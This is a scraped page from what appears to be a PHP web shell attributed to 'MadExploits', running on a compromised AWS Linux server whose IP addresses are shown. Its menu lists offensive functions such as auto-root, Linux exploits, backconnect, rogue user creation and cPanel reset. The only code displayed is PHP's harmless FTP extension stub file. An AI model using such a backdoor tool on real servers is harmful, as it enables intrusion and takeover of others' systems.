Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.144.134.101
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
php /
81 /
src /
ext /
ftp /
[ HOME SHELL ]
Name
Size
Permission
Action
tests
[ DIR ]
drwxr-xr-x
CREDITS
33
B
-rw-r--r--
config.m4
808
B
-rw-r--r--
config.w32
347
B
-rw-r--r--
ftp.c
45.07
KB
-rw-r--r--
ftp.h
8.64
KB
-rw-r--r--
ftp.stub.php
3.9
KB
-rw-r--r--
ftp_arginfo.h
10.87
KB
-rw-r--r--
php_ftp.c
31.07
KB
-rw-r--r--
php_ftp.h
1.43
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ftp.stub.php
<?php /** @generate-class-entries */ namespace FTP { /** * @strict-properties * @not-serializable */ final class Connection { } } namespace { function ftp_connect(string $hostname, int $port = 21, int $timeout = 90): FTP\Connection|false {} #ifdef HAVE_FTP_SSL function ftp_ssl_connect(string $hostname, int $port = 21, int $timeout = 90): FTP\Connection|false {} #endif function ftp_login(FTP\Connection $ftp, string $username, string $password): bool {} function ftp_pwd(FTP\Connection $ftp): string|false {} function ftp_cdup(FTP\Connection $ftp): bool {} function ftp_chdir(FTP\Connection $ftp, string $directory): bool {} function ftp_exec(FTP\Connection $ftp, string $command): bool {} /** * @return array<int, string>|null * @refcount 1 */ function ftp_raw(FTP\Connection $ftp, string $command): ?array {} function ftp_mkdir(FTP\Connection $ftp, string $directory): string|false {} function ftp_rmdir(FTP\Connection $ftp, string $directory): bool {} function ftp_chmod(FTP\Connection $ftp, int $permissions, string $filename): int|false {} /** @param string $response */ function ftp_alloc(FTP\Connection $ftp, int $size, &$response = null): bool {} /** * @return array<int, string>|false * @refcount 1 */ function ftp_nlist(FTP\Connection $ftp, string $directory): array|false {} /** * @return array<int, string>|false * @refcount 1 */ function ftp_rawlist(FTP\Connection $ftp, string $directory, bool $recursive = false): array|false {} /** * @return array<int, array>|false * @refcount 1 */ function ftp_mlsd(FTP\Connection $ftp, string $directory): array|false {} function ftp_systype(FTP\Connection $ftp): string|false {} /** @param resource $stream */ function ftp_fget(FTP\Connection $ftp, $stream, string $remote_filename, int $mode = FTP_BINARY, int $offset = 0): bool {} /** @param resource $stream */ function ftp_nb_fget(FTP\Connection $ftp, $stream, string $remote_filename, int $mode = FTP_BINARY, int $offset = 0): int {} function ftp_pasv(FTP\Connection $ftp, bool $enable): bool {} function ftp_get(FTP\Connection $ftp, string $local_filename, string $remote_filename, int $mode = FTP_BINARY, int $offset = 0): bool {} function ftp_nb_get(FTP\Connection $ftp, string $local_filename, string $remote_filename, int $mode = FTP_BINARY, int $offset = 0): int {} function ftp_nb_continue(FTP\Connection $ftp): int {} /** @param resource $stream */ function ftp_fput(FTP\Connection $ftp, string $remote_filename, $stream, int $mode = FTP_BINARY, int $offset = 0): bool {} /** @param resource $stream */ function ftp_nb_fput(FTP\Connection $ftp, string $remote_filename, $stream, int $mode = FTP_BINARY, int $offset = 0): int {} function ftp_put(FTP\Connection $ftp, string $remote_filename, string $local_filename, int $mode = FTP_BINARY, int $offset = 0): bool {} function ftp_append(FTP\Connection $ftp, string $remote_filename, string $local_filename, int $mode = FTP_BINARY): bool {} function ftp_nb_put(FTP\Connection $ftp, string $remote_filename, string $local_filename, int $mode = FTP_BINARY, int $offset = 0): int|false {} function ftp_size(FTP\Connection $ftp, string $filename): int {} function ftp_mdtm(FTP\Connection $ftp, string $filename): int {} function ftp_rename(FTP\Connection $ftp, string $from, string $to): bool {} function ftp_delete(FTP\Connection $ftp, string $filename): bool {} function ftp_site(FTP\Connection $ftp, string $command): bool {} function ftp_close(FTP\Connection $ftp): bool {} /** @alias ftp_close */ function ftp_quit(FTP\Connection $ftp): bool {} /** @param int|bool $value */ function ftp_set_option(FTP\Connection $ftp, int $option, $value): bool {} function ftp_get_option(FTP\Connection $ftp, int $option): int|bool {} }
Close